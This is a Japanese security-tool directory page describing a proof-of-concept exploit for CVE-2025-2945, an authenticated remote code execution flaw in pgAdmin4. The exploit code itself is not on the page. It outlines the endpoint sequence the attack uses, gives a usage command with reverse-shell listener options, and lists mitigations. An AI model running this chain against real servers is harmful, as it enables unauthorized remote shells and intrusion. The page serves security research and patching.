Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-2945-pgAdmin4-Authenticated-RCE-PoC- — pgAdmin4(CVE-2025-2945)のSQLエディタ悪用を介した認証済みリモートコード実行の概念実証エクスプロイト。許可されたセキュリティテストと教育用に設計されています。 | Kitploit
ツール/GitHubGitHub/udayveer17/cve-2025-2945-pgadmin4-authenticated-rce-poc-
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミング
GitHubudayveer17/cve-2025-2945-pgadmin4-authenticated-rce-poc-

CVE-2025-2945-pgAdmin4-Authenticated-RCE-PoC-

pgAdmin4(CVE-2025-2945)のSQLエディタ悪用を介した認証済みリモートコード実行の概念実証エクスプロイト。許可されたセキュリティテストと教育用に設計されています。

リポジトリを見る
239ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-2945 – pgAdmin4 認証済みRCE(PoC)

このリポジトリには、pgAdmin4 の特定バージョンに影響する脆弱性 CVE-2025-2945 に関する概念実証(PoC)スクリプトが含まれています。本スクリプトは、セキュリティ研究および許可を得たペネトレーションテストを目的として作成されました。

この問題により、SQLエディタにアクセスできる認証済みpgAdminユーザーが、Query Toolパネルの初期化フローを悪用してリモートコード実行を引き起こすことができます。このPoCは、教育・監査・防御目的のみで本脆弱性を実証するものです。


このCVEとPoCの仕組みを理解したい場合は、この記事を読んでください

  • (https://www.udayxd.xyz/write-up-blogs/cves-explain/cve-2025-2945)

⚠️ 法的・倫理的注意事項

このツールは以下の目的にのみ使用を想定しています:

  • セキュリティ研究者
  • 事前に書面による許可を得たレッドチーム運用者
  • 自身のインフラストラクチャを検証するシステム管理者
  • 脆弱なフローの教育的分析

明示的な許可なく、いかなるシステムでもこのツールを使用しないでください。 無許可での使用は違法かつ非倫理的です。 作者は不正使用について一切責任を負いません。


✔️ 機能

  • 脆弱なpgAdmin4バージョン(8.10 → 9.1)を自動チェック
  • pgAdmin4に認証してCSRFトークンを取得
  • 有効なサーバーIDを検出
  • SQLエディタを正しく初期化(エクスプロイトチェーンに必須)
  • Query Toolダウンローダーエンドポイント経由でペイロードを送信
  • カスタムデータベース認証情報をサポート
  • カスタムリスナーIP/ポートをサポート(リバースシェルペイロード)

🧠 技術的概要

本脆弱性は、SQLエディタの初期化エンドポイントにおけるロジック上の欠陥に起因します。 および へのアクセス時、アプリケーションはユーザー制御のデータを不適切に処理するため、最終的に細工されたペイロードによって任意のバックエンドコマンドが実行可能になります。

/sqleditor/initialize/
/sqleditor/panel/

このPoCは、以下のエンドポイントシーケンスを悪用します:

  1. 認証とCSRFトークンの取得
  2. サーバー接続の検索
  3. SQLエディタの初期化
  4. パネルの登録
  5. Query ToolダウンロードAPIを介したペイロードの配信

📦 要件

  • Python 3.x
  • requests ライブラリ
  • 有効なpgAdmin認証情報
  • 有効なデータベース認証情報
  • 承認された環境でのテスト用の制御されたリスナー(例:Netcat)

🚀 使用方法

基本構文

root@kitploit:~
python3 poc.py \
  --target-url <pgadmin-url> \
  --username <pgadmin-user> \
  --password <pgadmin-pass> \
  --db-user <db-username> \
  --db-pass <db-password> \
  --db-name <database> \
  --Rhost <your-ip> \
  --Rport <your-port>

(完全な使用例はスクリプトのヘルプセクションに記載されています。)


📁 ファイル構成

root@kitploit:~
poc.py        → The exploit proof-of-concept
README.md     → Project documentation

🛡 緩和策

管理者は以下を行う必要があります:

  • 利用可能になり次第、pgAdmin4をパッチ適用済みバージョンに更新する
  • SQLエディタへのアクセスを信頼できる管理者アカウントに制限する
  • MFAと強力なパスワードを強制する
  • pgAdminのネットワーク露出を制限する
  • 不審なSQLエディタリクエストを監視する

✨ クレジット

作者: UdayVeer

  • X: https://x.com/udaypro2008
  • GitHub: https://github.com/ExtremeUday
  • LinkedIn: https://www.linkedin.com/in/uday-veer-8002a5360/
  • HackTheBox: ExtremeUday2

ツールをダウンロード